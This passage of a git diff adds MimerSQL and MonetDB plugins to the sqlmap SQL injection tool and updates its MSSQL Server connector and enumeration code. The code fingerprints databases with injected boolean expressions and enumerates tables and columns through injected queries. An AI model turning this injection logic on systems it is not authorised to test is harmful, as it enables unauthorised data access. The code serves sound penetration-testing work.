getStatements(self): + warnMsg = "on MimerSQL it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] + + def getRoles(self, *args, **kwargs): + warnMsg = "on MimerSQL it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on MimerSQL it is not possible to enumerate the hostname" + logger.warning(warnMsg) diff --git a/plugins/dbms/mimersql/filesystem.py b/plugins/dbms/mimersql/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/mimersql/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/mimersql/fingerprint.py b/plugins/dbms/mimersql/fingerprint.py new file mode 100644 index 00000000000..3372a8fe7b0 --- /dev/null +++ b/plugins/dbms/mimersql/fingerprint.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying 
permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import MIMERSQL_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.MIMERSQL) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.MIMERSQL + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(MIMERSQL_ALIASES): + setDbms(DBMS.MIMERSQL) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.MIMERSQL + logger.info(infoMsg) + + result = inject.checkBooleanExpression("IRAND() IS NOT NULL") + + if result: + infoMsg = "confirming %s" % DBMS.MIMERSQL + logger.info(infoMsg) + + result = inject.checkBooleanExpression("PASTE('[RANDSTR1]',0,0,'[RANDSTR2]')='[RANDSTR2][RANDSTR1]'") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.MIMERSQL + logger.warning(warnMsg) + + return False + + setDbms(DBMS.MIMERSQL) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.MIMERSQL + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/mimersql/syntax.py b/plugins/dbms/mimersql/syntax.py new file mode 100644 index 00000000000..8257c9af870 --- /dev/null +++ b/plugins/dbms/mimersql/syntax.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> from lib.core.common import Backend + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT UNICODE_CHAR(97)||UNICODE_CHAR(98)||UNICODE_CHAR(99)||UNICODE_CHAR(100)||UNICODE_CHAR(101)||UNICODE_CHAR(102)||UNICODE_CHAR(103)||UNICODE_CHAR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("UNICODE_CHAR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/mimersql/takeover.py b/plugins/dbms/mimersql/takeover.py new file mode 100644 index 00000000000..7055371b8c5 --- /dev/null +++ b/plugins/dbms/mimersql/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class 
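# Editor's note (sketch): the MimerSQL Syntax.escape above delegates to the generic
# Syntax._escape helper with an escaper that rewrites each quoted literal as a
# concatenation of character functions (UNICODE_CHAR() here, CODE() for MonetDB below).
# The standalone function that follows is a simplified illustration of that idea only;
# it is not sqlmap's implementation, and its naive regex assumes no escaped quotes.

import re

def escape_single_quoted(expression, char_func="UNICODE_CHAR"):
    """Rewrite 'literal' occurrences as CHAR_FUNC(ord)||... concatenations."""
    def _replace(match):
        value = match.group(1)
        if not value:
            return "''"  # leave empty string literals untouched
        return "||".join("%s(%d)" % (char_func, ord(c)) for c in value)

    return re.sub(r"'([^']*)'", _replace, expression)

# Example (mirrors the doctest in the plugin above):
# escape_single_quoted("SELECT 'abc' FROM foobar")
# -> "SELECT UNICODE_CHAR(97)||UNICODE_CHAR(98)||UNICODE_CHAR(99) FROM foobar"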
Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on MimerSQL it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on MimerSQL it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on MimerSQL it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on MimerSQL it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/monetdb/__init__.py b/plugins/dbms/monetdb/__init__.py new file mode 100644 index 00000000000..200b23b290f --- /dev/null +++ b/plugins/dbms/monetdb/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import MONETDB_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.monetdb.enumeration import Enumeration +from plugins.dbms.monetdb.filesystem import Filesystem +from plugins.dbms.monetdb.fingerprint import Fingerprint +from plugins.dbms.monetdb.syntax import Syntax +from plugins.dbms.monetdb.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class MonetDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines MonetDB methods + """ + + def __init__(self): + self.excludeDbsList = MONETDB_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.MONETDB] = Syntax.escape diff --git a/plugins/dbms/monetdb/connector.py b/plugins/dbms/monetdb/connector.py new file mode 100644 index 00000000000..66a6bcdf8eb --- /dev/null +++ b/plugins/dbms/monetdb/connector.py @@ -0,0 +1,59 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import pymonetdb +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/gijzelaerr/pymonetdb + User guide: https://pymonetdb.readthedocs.io/en/latest/index.html + API: https://www.python.org/dev/peps/pep-0249/ + License: Mozilla Public License 2.0 + """ + + def connect(self): + self.initConnection() + + try: + self.connector = pymonetdb.connect(hostname=self.hostname, username=self.user, password=self.password, database=self.db, port=self.port, connect_timeout=conf.timeout) + except pymonetdb.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except pymonetdb.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except (pymonetdb.OperationalError, pymonetdb.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except pymonetdb.InternalError as ex: + raise 
SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/monetdb/enumeration.py b/plugins/dbms/monetdb/enumeration.py new file mode 100644 index 00000000000..8634adab8d6 --- /dev/null +++ b/plugins/dbms/monetdb/enumeration.py @@ -0,0 +1,38 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on MonetDB it is not possible to enumerate password hashes" + logger.warning(warnMsg) + + return {} + + def getStatements(self): + warnMsg = "on MonetDB it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on MonetDB it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on MonetDB it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on MonetDB it is not possible to enumerate the hostname" + logger.warning(warnMsg) diff --git a/plugins/dbms/monetdb/filesystem.py b/plugins/dbms/monetdb/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/monetdb/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/monetdb/fingerprint.py b/plugins/dbms/monetdb/fingerprint.py new file mode 100644 index 00000000000..83c065d18b4 --- /dev/null +++ b/plugins/dbms/monetdb/fingerprint.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import MONETDB_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.MONETDB) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.MONETDB + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + 
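# Editor's note (sketch): the MimerSQL and MonetDB connector plugins above follow the same
# PEP 249 (DB-API 2.0) pattern: connect(), obtain a cursor, execute(), commit(), fetchall(),
# with driver-specific exceptions either logged or mapped onto SqlmapConnectionException.
# The self-contained sketch below shows that round trip with the stdlib sqlite3 driver as a
# stand-in; run_query() and its behaviour are illustrative, not part of sqlmap.

import sqlite3

def run_query(database, query):
    """Minimal DB-API round trip: connect, execute, commit, fetch."""
    connection = sqlite3.connect(database)   # pymonetdb/mimerpy expose an equivalent connect()
    try:
        cursor = connection.cursor()
        cursor.execute(query)
        connection.commit()                  # the plugins commit after every execute()
        return cursor.fetchall()
    except sqlite3.Error as ex:              # driver errors are caught, logged, not re-raised blindly
        print("(remote) %s" % ex)
        return None
    finally:
        connection.close()

# Example:
# run_query(":memory:", "SELECT 1")  ->  [(1,)]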
if not conf.extensiveFp and Backend.isDbmsWithin(MONETDB_ALIASES): + setDbms(DBMS.MONETDB) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.MONETDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("isaurl(NULL)=false") + + if result: + infoMsg = "confirming %s" % DBMS.MONETDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("CODE(0) IS NOT NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.MONETDB + logger.warning(warnMsg) + + return False + + setDbms(DBMS.MONETDB) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.MONETDB + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/monetdb/syntax.py b/plugins/dbms/monetdb/syntax.py new file mode 100644 index 00000000000..e93396d6e9f --- /dev/null +++ b/plugins/dbms/monetdb/syntax.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> from lib.core.common import Backend + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CODE(97)||CODE(98)||CODE(99)||CODE(100)||CODE(101)||CODE(102)||CODE(103)||CODE(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CODE(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/monetdb/takeover.py b/plugins/dbms/monetdb/takeover.py new file mode 100644 index 00000000000..bf0fa25305c --- /dev/null +++ b/plugins/dbms/monetdb/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on MonetDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on MonetDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on MonetDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on MonetDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/mssqlserver/__init__.py b/plugins/dbms/mssqlserver/__init__.py index 7dee4fe9872..e19a115f887 100644 --- a/plugins/dbms/mssqlserver/__init__.py +++ b/plugins/dbms/mssqlserver/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -15,7 +15,6 @@ from plugins.dbms.mssqlserver.takeover import Takeover from plugins.generic.misc import Miscellaneous - class MSSQLServerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): """ This class defines Microsoft SQL Server methods @@ -24,11 +23,7 @@ class MSSQLServerMap(Syntax, Fingerprint, 
Enumeration, Filesystem, Miscellaneous def __init__(self): self.excludeDbsList = MSSQL_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.MSSQL] = Syntax.escape diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py index 7eb0a82bb7c..f49cabaa646 100644 --- a/plugins/dbms/mssqlserver/connector.py +++ b/plugins/dbms/mssqlserver/connector.py @@ -1,19 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import _mssql import pymssql -except ImportError: +except: pass import logging -from lib.core.convert import utf8encode +from lib.core.common import getSafeExString +from lib.core.convert import getText from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -21,9 +22,9 @@ class Connector(GenericConnector): """ - Homepage: http://pymssql.sourceforge.net/ - User guide: http://pymssql.sourceforge.net/examples_pymssql.php - API: http://pymssql.sourceforge.net/ref_pymssql.php + Homepage: http://www.pymssql.org/en/stable/ + User guide: http://www.pymssql.org/en/stable/pymssql_examples.html + API: http://www.pymssql.org/en/stable/ref/pymssql.html Debian package: python-pymssql License: LGPL @@ -33,37 +34,36 @@ class Connector(GenericConnector): to work, get it from http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/ """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): self.initConnection() try: self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except (pymssql.InterfaceError, pymssql.OperationalError), msg: - raise SqlmapConnectionException(msg) + except (pymssql.Error, _mssql.MssqlDatabaseException) as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + except ValueError: + raise SqlmapConnectionException self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) + except (pymssql.Error, _mssql.MssqlDatabaseException) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex).replace("\n", " ")) return None def execute(self, query): retVal = False try: - self.cursor.execute(utf8encode(query)) + self.cursor.execute(getText(query)) retVal = True - except (pymssql.OperationalError, pymssql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) - except pymssql.InternalError, msg: - raise SqlmapConnectionException(msg) + except (pymssql.OperationalError, pymssql.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex).replace("\n", " ")) + except pymssql.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) return retVal diff 
--git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 5131f2b45dd..28de4c5d672 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -1,42 +1,45 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import re + from lib.core.agent import agent from lib.core.common import arrayizeValue -from lib.core.common import Backend from lib.core.common import getLimitRange from lib.core.common import isInferenceAvailable from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import safeStringFormat +from lib.core.common import singleTimeLogMessage +from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException from lib.core.settings import CURRENT_DB from lib.request import inject - from plugins.generic.enumeration import Enumeration as GenericEnumeration +from thirdparty import six class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getPrivileges(self, *args): + def getPrivileges(self, *args, **kwargs): warnMsg = "on Microsoft SQL Server it is not possible to fetch " warnMsg += "database users privileges, sqlmap will check whether " warnMsg += "or not the database users are database administrators" - logger.warn(warnMsg) + logger.warning(warnMsg) users = [] areAdmins = set() @@ -49,6 +52,8 @@ def getPrivileges(self, *args): users = kb.data.cachedUsers for user in users: + user = unArrayizeValue(user) + if user is None: continue @@ -71,27 +76,31 @@ def getTables(self): conf.db = self.getCurrentDb() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() for db in dbs: dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) - dbs = filter(None, dbs) + dbs = [_ for _ in dbs if _] infoMsg = "fetching tables for database" - infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) + infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs))) logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].tables + rootQuery = queries[DBMS.MSSQL].tables if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: for db in dbs: if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) + continue + if conf.exclude and re.search(conf.exclude, db, re.I) is not None: + infoMsg = "skipping database '%s'" % db + singleTimeLogMessage(infoMsg) continue for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3): @@ -101,16 +110,20 @@ def 
getTables(self): break if not isNoneValue(value): - value = filter(None, arrayizeValue(value)) - value = [safeSQLIdentificatorNaming(_, True) for _ in value] + value = [_ for _ in arrayizeValue(value) if _] + value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value] kb.data.cachedTables[db] = value if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct: for db in dbs: if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) + continue + if conf.exclude and re.search(conf.exclude, db, re.I) is not None: + infoMsg = "skipping database '%s'" % db + singleTimeLogMessage(infoMsg) continue infoMsg = "fetching number of tables for " @@ -127,13 +140,13 @@ def getTables(self): if count != 0: warnMsg = "unable to retrieve the number of " warnMsg += "tables for database '%s'" % db - logger.warn(warnMsg) + logger.warning(warnMsg) continue tables = [] for index in xrange(int(count)): - _ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db) % index + _ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db), index) table = inject.getValue(_, union=False, error=False) if not isNoneValue(table): @@ -146,9 +159,9 @@ def getTables(self): else: warnMsg = "unable to retrieve the tables " warnMsg += "for database '%s'" % db - logger.warn(warnMsg) + logger.warning(warnMsg) - if not kb.data.cachedTables: + if not kb.data.cachedTables and not conf.search: errMsg = "unable to retrieve the tables for any database" raise SqlmapNoneDataException(errMsg) else: @@ -159,13 +172,16 @@ def getTables(self): def searchTable(self): foundTbls = {} - tblList = conf.tbl.split(",") - rootQuery = queries[Backend.getIdentifiedDbms()].search_table + tblList = conf.tbl.split(',') + rootQuery = queries[DBMS.MSSQL].search_table tblCond = rootQuery.inband.condition tblConsider, tblCondParam = self.likeOrExact("table") - if conf.db and conf.db != CURRENT_DB: - enumDbs = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + enumDbs = conf.db.split(',') elif not len(kb.data.cachedDbs): enumDbs = self.getDbs() else: @@ -180,7 +196,7 @@ def searchTable(self): infoMsg = "searching table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.info(infoMsg) @@ -192,8 +208,12 @@ def searchTable(self): if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) + continue + if conf.exclude and re.search(conf.exclude, db, re.I) is not None: + infoMsg = "skipping database '%s'" % db + singleTimeLogMessage(infoMsg) continue if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -202,7 +222,7 @@ def searchTable(self): values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): - if isinstance(values, basestring): + if isinstance(values, six.string_types): values = [values] for foundTbl in values: @@ -213,7 +233,7 @@ def searchTable(self): else: infoMsg = "fetching number of table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " 
'%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -225,10 +245,10 @@ def searchTable(self): if not isNumPosStrValue(count): warnMsg = "no table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) + logger.warning(warnMsg) continue @@ -243,34 +263,41 @@ def searchTable(self): kb.hintValue = tbl foundTbls[db].append(tbl) - for db, tbls in foundTbls.items(): + for db, tbls in list(foundTbls.items()): if len(tbls) == 0: foundTbls.pop(db) if not foundTbls: warnMsg = "no databases contain any of the provided tables" - logger.warn(warnMsg) + logger.warning(warnMsg) return conf.dumper.dbTables(foundTbls) self.dumpFoundTables(foundTbls) def searchColumn(self): - rootQuery = queries[Backend.getIdentifiedDbms()].search_column + rootQuery = queries[DBMS.MSSQL].search_column foundCols = {} dbs = {} whereTblsQuery = "" infoMsgTbl = "" infoMsgDb = "" - colList = conf.col.split(",") + colList = conf.col.split(',') + + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + origTbl = conf.tbl origDb = conf.db colCond = rootQuery.inband.condition tblCond = rootQuery.inband.condition2 colConsider, colCondParam = self.likeOrExact("column") - if conf.db and conf.db != CURRENT_DB: - enumDbs = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + enumDbs = conf.db.split(',') elif not len(kb.data.cachedDbs): enumDbs = self.getDbs() else: @@ -287,22 +314,24 @@ def searchColumn(self): infoMsg = "searching column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) foundCols[column] = {} if conf.tbl: - _ = conf.tbl.split(",") + _ = conf.tbl.split(',') whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _)) - if conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + _ = conf.db.split(',') infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) elif conf.excludeSysDbs: - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) + infoMsgDb = " not in system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) else: infoMsgDb = " across all databases" @@ -311,12 +340,15 @@ def searchColumn(self): colQuery = "%s%s" % (colCond, colCondParam) colQuery = colQuery % unsafeSQLIdentificatorNaming(column) - for db in dbs.keys(): + for db in (_ for _ in dbs if _): db = safeSQLIdentificatorNaming(db) if conf.excludeSysDbs and db in self.excludeDbsList: continue + if conf.exclude and re.search(conf.exclude, db, re.I) is not None: + continue + if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: query = rootQuery.inband.query % (db, db, db, db, db, db) query += " AND %s" % colQuery.replace("[DB]", db) @@ -324,11 +356,11 @@ def searchColumn(self): values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): - if 
